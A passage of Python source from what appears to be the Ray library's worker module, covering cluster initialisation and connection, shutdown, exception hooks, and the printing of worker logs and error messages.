_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port(int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address, _deprecation_warn_enabled=False)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since most likely a typo in keyword
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if RAY_JOB_CONFIG_JSON_ENV_VAR in os.environ:
if runtime_env:
logger.warning(
"Both RAY_JOB_CONFIG_JSON_ENV_VAR and ray.init(runtime_env) "
"are provided, only using JSON_ENV_VAR to construct "
"job_config. Please ensure no runtime_env is used in driver "
"script's ray.init() when using job submission API.")
# Set runtime_env in job_config if passed as env variable, such as
# ray job submission with driver script executed in subprocess
job_config_json = json.loads(
os.environ.get(RAY_JOB_CONFIG_JSON_ENV_VAR))
job_config = ray.job_config.JobConfig.from_json(job_config_json)
# RAY_JOB_CONFIG_JSON_ENV_VAR is only set at ray job manager level and has
# higher priority in case user also provided runtime_env for ray.init()
elif runtime_env:
# Set runtime_env in job_config if passed in as part of ray.init()
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
# removal redis is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
# # doesn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callbacks after a successful ray init. Each entry is a
# zero-argument callable; init() invokes them all, in order, once the worker
# is connected.
_post_init_hooks = []
@PublicAPI
@client_mode_hook(auto_init=False)
def shutdown(_exiting_interpreter: bool = False):
    """Disconnect the worker, and terminate processes started by ray.init().
    This will automatically run at the end when a Python process that uses Ray
    exits. It is ok to run this twice in a row. The primary use case for this
    function is to cleanup state between tests.
    Note that this will clear any remote function definitions, actor
    definitions, and existing actors, so if you wish to use any previously
    defined remote functions or actors after calling ray.shutdown(), then you
    need to redefine them. If they were defined in an imported module, then you
    will need to reload the module.
    Args:
        _exiting_interpreter (bool): True if this is called by the atexit hook
            and false otherwise. If we are exiting the interpreter, we will
            wait a little while to print any extra error messages.
    """
    if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
        # This is a duration to sleep before shutting down everything in order
        # to make sure that log messages finish printing.
        time.sleep(0.5)
    # First stop this worker's own threads and drop its node reference.
    disconnect(_exiting_interpreter)
    # disconnect internal kv
    if hasattr(global_worker, "gcs_client"):
        del global_worker.gcs_client
    _internal_kv_reset()
    # We need to destruct the core worker here because after this function,
    # we will tear down any processes spawned by ray.init() and the background
    # IO thread in the core worker doesn't currently handle that gracefully.
    if hasattr(global_worker, "core_worker"):
        global_worker.core_worker.shutdown()
        del global_worker.core_worker
    # Disconnect global state from GCS.
    ray.state.state.disconnect()
    # Shut down the Ray processes.
    global _global_node
    if _global_node is not None:
        if _global_node.is_head():
            # Head-only cleanup of external storage (presumably the object
            # spilling backend — confirm) before killing processes.
            _global_node.destroy_external_storage()
        _global_node.kill_all_processes(check_alive=False, allow_graceful=True)
        _global_node = None
    # TODO(rkn): Instead of manually resetting some of the worker fields, we
    # should simply set "global_worker" to equal "None" or something like that.
    global_worker.set_mode(None)
# Run shutdown() automatically when the interpreter exits, flagging that we
# are exiting the interpreter (so it sleeps briefly for log flushing).
atexit.register(shutdown, True)


# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
    """Translate SIGTERM into a normal interpreter exit so atexit runs.

    Args:
        signum: The received signal number; also used as the exit status.
        frame: The interrupted stack frame (unused).
    """
    sys.exit(signum)


try:
    ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
    # Presumably raised when not running on the main thread, where signal
    # handlers cannot be installed — confirm against set_sigterm_handler.
    # BUG FIX: the two implicitly-concatenated string literals previously
    # rendered as "...processes mightnot be cleaned up..." (missing space).
    logger.warning("Failed to set SIGTERM handler, processes might "
                   "not be cleaned up properly on exit.")
# Install a custom excepthook so that a driver that dies with an uncaught
# exception records that exception in the GCS worker table.
normal_excepthook = sys.excepthook


def custom_excepthook(type, value, tb):
    """Record an uncaught driver exception, then delegate to the prior hook.

    Only connected drivers (SCRIPT_MODE with a worker_id) are recorded;
    every other process type falls straight through to the original hook.
    """
    driver_connected = (global_worker.mode == SCRIPT_MODE
                        and hasattr(global_worker, "worker_id"))
    if driver_connected:
        # Make sure the global state accessor exists before writing.
        ray.state.state._check_connected()
        formatted_tb = "".join(traceback.format_tb(tb))
        ray.state.state.add_worker(global_worker.worker_id, gcs_utils.DRIVER,
                                   {"exception": formatted_tb})
    # Always fall back to the previously-installed excepthook.
    normal_excepthook(type, value, tb)


sys.excepthook = custom_excepthook
def print_to_stdstream(data):
    """Forward a batch of worker log lines to stderr or stdout.

    The "is_err" flag on the batch selects the destination stream.
    """
    if data["is_err"]:
        target_stream = sys.stderr
    else:
        target_stream = sys.stdout
    print_worker_logs(data, target_stream)
# Start time of this process, used for relative time logs
# (consumed by time_string()).
t0 = time.time()
# Whether the one-time "Tip: use `ray status` ..." hint has already been
# emitted by filter_autoscaler_events().
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
    """Yield only the autoscaler event text found in raw monitor log lines.

    Event lines are recognized by the ":event_summary:" magic token; all
    other lines are dropped. A one-time usage tip is yielded before the
    very first event. Yields nothing when autoscaler events are disabled.
    """
    global autoscaler_log_fyi_printed
    if not AUTOSCALER_EVENTS:
        return
    token = ray_constants.LOG_PREFIX_EVENT_SUMMARY
    for raw_line in lines:
        if token not in raw_line:
            # Not an event line; skip it.
            continue
        if not autoscaler_log_fyi_printed:
            yield ("Tip: use `ray status` to view detailed "
                   "cluster status. To disable these "
                   "messages, set RAY_SCHEDULER_EVENTS=0.")
            autoscaler_log_fyi_printed = True
        # The event text immediately follows the magic token.
        yield raw_line.split(token)[1]
def time_string() -> str:
    """Return the relative time from the start of this process (t0).

    Formatted like "15m30s" or "1h2m3s": hours and minutes appear only when
    non-zero, seconds always (truncated to an integer).
    """
    delta = time.time() - t0
    # divmod replaces the original repeated-subtraction while-loops, which
    # took O(elapsed hours) iterations, with constant-time arithmetic.
    # (At exact multiples of 3600/60 the original's strict `>` comparison
    # produced e.g. "3600s"; divmod gives the intended "1h0s".)
    hours, remainder = divmod(delta, 3600)
    minutes, seconds = divmod(remainder, 60)
    output = ""
    if hours:
        output += "{}h".format(int(hours))
    if minutes:
        output += "{}m".format(int(minutes))
    output += "{}s".format(int(seconds))
    return output
# When we enter a breakpoint, worker logs are automatically disabled via this.
# Checked at the top of print_worker_logs(); toggled elsewhere (debugger).
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
    """Pretty-print one batch of worker/autoscaler log lines to print_file.

    Each line is prefixed with a dim, colored "(pid=..., ip=...)" tag; the
    ip suffix is omitted for lines that originate on the local node.
    """
    if not _worker_logs_enabled:
        return

    def prefix_for(data: Dict[str, str]) -> str:
        """The PID prefix for this log line."""
        # System processes (autoscaler/raylet) get no "pid=" prefix at all;
        # worker lines are optionally prefixed with the actor or task name.
        if data.get("pid") in ["autoscaler", "raylet"]:
            return ""
        else:
            res = "pid="
            if data.get("actor_name"):
                res = data["actor_name"] + " " + res
            elif data.get("task_name"):
                res = data["task_name"] + " " + res
            return res

    def color_for(data: Dict[str, str], line: str) -> str:
        """The color for this log line."""
        if data.get("pid") == "raylet":
            return colorama.Fore.YELLOW
        elif data.get("pid") == "autoscaler":
            # Highlight autoscaler errors/warnings in bright yellow.
            if "Error:" in line or "Warning:" in line:
                return colorama.Style.BRIGHT + colorama.Fore.YELLOW
            else:
                return colorama.Style.BRIGHT + colorama.Fore.CYAN
        else:
            return colorama.Fore.CYAN

    # Autoscaler output is filtered down to event summaries and tagged with a
    # relative timestamp instead of a real pid.
    if data.get("pid") == "autoscaler":
        pid = "scheduler +{}".format(time_string())
        lines = filter_autoscaler_events(data.get("lines", []))
    else:
        pid = data.get("pid")
        lines = data.get("lines", [])
    # NOTE(review): "localhost" presumably carries the local node's IP, so
    # lines from the local node omit the "ip=..." suffix — confirm against
    # the producer of `data`.
    if data.get("ip") == data.get("localhost"):
        for line in lines:
            print(
                "{}{}({}{}){} {}".format(colorama.Style.DIM,
                                         color_for(data,
                                                   line), prefix_for(data),
                                         pid, colorama.Style.RESET_ALL, line),
                file=print_file)
    else:
        for line in lines:
            print(
                "{}{}({}{}, ip={}){} {}".format(colorama.Style.DIM,
                                                color_for(data, line),
                                                prefix_for(data), pid,
                                                data.get("ip"),
                                                colorama.Style.RESET_ALL,
                                                line),
                file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
    """Listen to error messages in the background on the driver.
    This runs in a separate thread on the driver and pushes (error, time)
    tuples to the output queue.
    Args:
        worker: The worker class that this thread belongs to.
        threads_stopped (threading.Event): A threading event used to signal to
            the thread that it should exit.
    """
    worker.error_message_pubsub_client = worker.redis_client.pubsub(
        ignore_subscribe_messages=True)
    # Exports that are published after the call to
    # error_message_pubsub_client.subscribe and before the call to
    # error_message_pubsub_client.listen will still be processed in the loop.
    # Really we should just subscribe to the errors for this specific job.
    # However, currently all errors seem to be published on the same channel.
    error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
    worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
    try:
        if _internal_kv_initialized():
            # Get any autoscaler errors that occurred before the call to
            # subscribe.
            error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
            if error_message is not None:
                logger.warning(error_message.decode())
        while True:
            # Exit if we received a signal that we should stop.
            if threads_stopped.is_set():
                return
            msg = worker.error_message_pubsub_client.get_message()
            if msg is None:
                # Nothing published yet; back off briefly. Using the stop
                # event's wait() lets a shutdown interrupt the sleep.
                threads_stopped.wait(timeout=0.01)
                continue
            pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
            error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
            job_id = error_data.job_id
            # Only surface errors for this driver's job, or job-agnostic
            # errors published under the nil job id.
            if job_id not in [
                    worker.current_job_id.binary(),
                    JobID.nil().binary(),
            ]:
                continue
            error_message = error_data.error_message
            if (error_data.type == ray_constants.TASK_PUSH_ERROR):
                # TODO(ekl) remove task push errors entirely now that we have
                # the separate unhandled exception handler.
                pass
            else:
                logger.warning(error_message)
    except (OSError, redis.exceptions.ConnectionError) as e:
        logger.error(f"listen_error_messages_raylet: {e}")
    finally:
        # Close the pubsub client to avoid leaking file descriptors.
        worker.error_message_pubsub_client.close()
def listen_error_messages_from_gcs(worker, threads_stopped):
    """Listen to error messages in the background on the driver.
    This runs in a separate thread on the driver and pushes (error, time)
    tuples to be published.
    Args:
        worker: The worker class that this thread belongs to.
        threads_stopped (threading.Event): A threading event used to signal to
            the thread that it should exit.
    """
    # The subscriber is stored on the worker so disconnect() can close it,
    # which unblocks the poll_error() call below.
    worker.gcs_subscriber = GcsSubscriber(channel=worker.gcs_channel)
    # Exports that are published after the call to
    # gcs_subscriber.subscribe_error() and before the call to
    # gcs_subscriber.poll_error() will still be processed in the loop.
    # TODO: we should just subscribe to the errors for this specific job.
    worker.gcs_subscriber.subscribe_error()
    try:
        if _internal_kv_initialized():
            # Get any autoscaler errors that occurred before the call to
            # subscribe.
            error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
            if error_message is not None:
                logger.warning(error_message.decode())
        while True:
            # Exit if received a signal that the thread should stop.
            if threads_stopped.is_set():
                return
            _, error_data = worker.gcs_subscriber.poll_error()
            if error_data is None:
                continue
            # Only surface errors for this driver's job, or job-agnostic
            # errors published under the nil job id.
            if error_data.job_id not in [
                    worker.current_job_id.binary(),
                    JobID.nil().binary(),
            ]:
                continue
            error_message = error_data.error_message
            if error_data.type == ray_constants.TASK_PUSH_ERROR:
                # TODO(ekl) remove task push errors entirely now that we have
                # the separate unhandled exception handler.
                pass
            else:
                logger.warning(error_message)
    except (OSError, ConnectionError) as e:
        logger.error(f"listen_error_messages_from_gcs: {e}")
@PublicAPI
@client_mode_hook(auto_init=False)
def is_initialized() -> bool:
    """Report whether this process is connected to a Ray cluster.

    Returns:
        True if ray.init has already been called and false otherwise.
    """
    worker = ray.worker.global_worker
    return worker.connected
def connect(node,
            mode=WORKER_MODE,
            log_to_driver=False,
            worker=global_worker,
            driver_object_store_memory=None,
            job_id=None,
            namespace=None,
            job_config=None,
            runtime_env_hash=0,
            worker_shim_pid=0,
            startup_token=0,
            ray_debugger_external=False):
    """Connect this worker to the raylet, to Plasma, and to Redis.
    Args:
        node (ray.node.Node): The node to connect.
        mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
            LOCAL_MODE.
        log_to_driver (bool): If true, then output from all of the worker
            processes on all nodes will be directed to the driver.
        worker: The ray.Worker instance.
        driver_object_store_memory: Deprecated.
        job_id: The ID of job. If it's None, then we will generate one.
        namespace (str): Ray namespace to set on the job config, if given.
        job_config (ray.job_config.JobConfig): The job configuration.
        runtime_env_hash (int): The hash of the runtime env for this worker.
        worker_shim_pid (int): The PID of the process for setup worker
            runtime env.
        startup_token (int): The startup token of the process assigned to
            it during startup as a command line argument.
        ray_debugger_external (bool): If true, bind the Ray debugger to an
            external-facing address on this worker.
    """
    # Do some basic checking to make sure we didn't call ray.init twice.
    error_message = "Perhaps you called ray.init twice by accident?"
    assert not worker.connected, error_message
    assert worker.cached_functions_to_run is not None, error_message
    # Enable nice stack traces on SIGSEGV etc.
    try:
        if not faulthandler.is_enabled():
            faulthandler.enable(all_threads=False)
    except io.UnsupportedOperation:
        pass  # ignore
    # Create a Redis client to primary.
    # The Redis client can safely be shared between threads. However,
    # that is not true of Redis pubsub clients. See the documentation at
    # https://github.com/andymccurdy/redis-py#thread-safety.
    worker.redis_client = node.create_redis_client()
    worker.gcs_channel = gcs_utils.create_gcs_channel(
        gcs_utils.get_gcs_address_from_redis(worker.redis_client))
    worker.gcs_client = gcs_utils.GcsClient(channel=worker.gcs_channel)
    _initialize_internal_kv(worker.gcs_client)
    ray.state.state._initialize_global_state(
        node.redis_address, redis_password=node.redis_password)
    worker.gcs_pubsub_enabled = gcs_pubsub_enabled()
    worker.gcs_publisher = None
    if worker.gcs_pubsub_enabled:
        worker.gcs_publisher = GcsPublisher(channel=worker.gcs_channel)
    # Initialize some fields.
    if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
        # We should not specify the job_id if it's `WORKER_MODE`.
        assert job_id is None
        job_id = JobID.nil()
    else:
        # This is the code path of driver mode.
        if job_id is None:
            job_id = ray.state.next_job_id()
    # Give non-driver worker processes a descriptive process title.
    if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
        process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
        if mode is SPILL_WORKER_MODE:
            process_name = (
                ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
        elif mode is RESTORE_WORKER_MODE:
            process_name = (
                ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
        setproctitle.setproctitle(process_name)
    if not isinstance(job_id, JobID):
        raise TypeError("The type of given job id must be JobID.")
    # All workers start out as non-actors. A worker can be turned into an actor
    # after it is created.
    worker.node = node
    worker.set_mode(mode)
    # For driver's check that the version information matches the version
    # information that the Ray cluster was started with.
    try:
        ray._private.services.check_version_info(worker.redis_client)
    except Exception as e:
        # Drivers fail hard on a version mismatch; workers report the
        # mismatch to the driver instead of dying here.
        if mode == SCRIPT_MODE:
            raise e
        elif mode == WORKER_MODE:
            traceback_str = traceback.format_exc()
            ray._private.utils.publish_error_to_driver(
                ray_constants.VERSION_MISMATCH_PUSH_ERROR,
                traceback_str,
                job_id=None,
                redis_client=worker.redis_client,
                gcs_publisher=worker.gcs_publisher)
    worker.lock = threading.RLock()
    driver_name = ""
    log_stdout_file_path = ""
    log_stderr_file_path = ""
    interactive_mode = False
    if mode == SCRIPT_MODE:
        import __main__ as main
        if hasattr(main, "__file__"):
            driver_name = main.__file__
        else:
            interactive_mode = True
            driver_name = "INTERACTIVE MODE"
    elif not LOCAL_MODE:
        # NOTE(review): `not LOCAL_MODE` is a constant expression (always
        # False when LOCAL_MODE is a non-zero constant), so this ValueError
        # is unreachable as written. The intended condition is unclear
        # (`mode != LOCAL_MODE` would break WORKER_MODE connects) — confirm
        # before changing.
        raise ValueError(
            "Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
    redis_address, redis_port = node.redis_address.split(":")
    gcs_options = ray._raylet.GcsClientOptions(
        redis_address,
        int(redis_port),
        node.redis_password,
    )
    if job_config is None:
        job_config = ray.job_config.JobConfig()
    if namespace is not None:
        ray._private.utils.validate_namespace(namespace)
        # The namespace field of job config may have already been set in code
        # paths such as the client.
        job_config.set_ray_namespace(namespace)
    # Make sure breakpoint() in the user's code will
    # invoke the Ray debugger if we are in a worker or actor process
    # (but not on the driver).
    if mode == WORKER_MODE:
        os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
    else:
        # Add hook to suppress worker logs during breakpoint.
        os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
    worker.ray_debugger_external = ray_debugger_external
    # If it's a driver and it's not coming from ray client, we'll prepare the
    # environment here. If it's ray client, the environment will be prepared
    # at the server side.
    if (mode == SCRIPT_MODE and not job_config.client_job
            and job_config.runtime_env):
        scratch_dir: str = worker.node.get_runtime_env_dir_path()
        runtime_env = job_config.runtime_env or {}
        runtime_env = upload_py_modules_if_needed(
            runtime_env, scratch_dir, logger=logger)
        runtime_env = upload_working_dir_if_needed(
            runtime_env, scratch_dir, logger=logger)
        # Remove excludes, it isn't relevant after the upload step.
        runtime_env.pop("excludes", None)
        job_config.set_runtime_env(runtime_env)
    serialized_job_config = job_config.serialize()
    worker.core_worker = ray._raylet.CoreWorker(
        mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
        gcs_options, node.get_logs_dir_path(), node.node_ip_address,
        node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
        driver_name, log_stdout_file_path, log_stderr_file_path,
        serialized_job_config, node.metrics_agent_port, runtime_env_hash,
        worker_shim_pid, startup_token)
    # Notify raylet that the core worker is ready.
    worker.core_worker.notify_raylet()
    if driver_object_store_memory is not None:
        logger.warning("`driver_object_store_memory` is deprecated"
                       " and will be removed in the future.")
    # Start the import thread
    if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
        worker.import_thread = import_thread.ImportThread(
            worker, mode, worker.threads_stopped)
        worker.import_thread.start()
    # If this is a driver running in SCRIPT_MODE, start a thread to print error
    # messages asynchronously in the background. Ideally the scheduler would
    # push messages to the driver's worker service, but we ran into bugs when
    # trying to properly shutdown the driver's worker service, so we are
    # temporarily using this implementation which constantly queries the
    # scheduler for new error messages.
    if mode == SCRIPT_MODE:
        worker.listener_thread = threading.Thread(
            target=listen_error_messages_from_gcs
            if worker.gcs_pubsub_enabled else listen_error_messages_raylet,
            name="ray_listen_error_messages",
            args=(worker, worker.threads_stopped))
        worker.listener_thread.daemon = True
        worker.listener_thread.start()
        if log_to_driver:
            global_worker_stdstream_dispatcher.add_handler(
                "ray_print_logs", print_to_stdstream)
            worker.logger_thread = threading.Thread(
                target=worker.print_logs, name="ray_print_logs")
            worker.logger_thread.daemon = True
            worker.logger_thread.start()
    if mode == SCRIPT_MODE:
        # Add the directory containing the script that is running to the Python
        # paths of the workers. Also add the current directory. Note that this
        # assumes that the directory structures on the machines in the clusters
        # are the same.
        # When using an interactive shell, there is no script directory.
        if not interactive_mode:
            script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
            worker.run_function_on_all_workers(
                lambda worker_info: sys.path.insert(1, script_directory))
        # In client mode, if we use runtime envs with "working_dir", then
        # it'll be handled automatically. Otherwise, add the current dir.
        if not job_config.client_job and len(
                job_config.get_runtime_env_uris()) == 0:
            current_directory = os.path.abspath(os.path.curdir)
            worker.run_function_on_all_workers(
                lambda worker_info: sys.path.insert(1, current_directory))
        # TODO(rkn): Here we first export functions to run, then remote
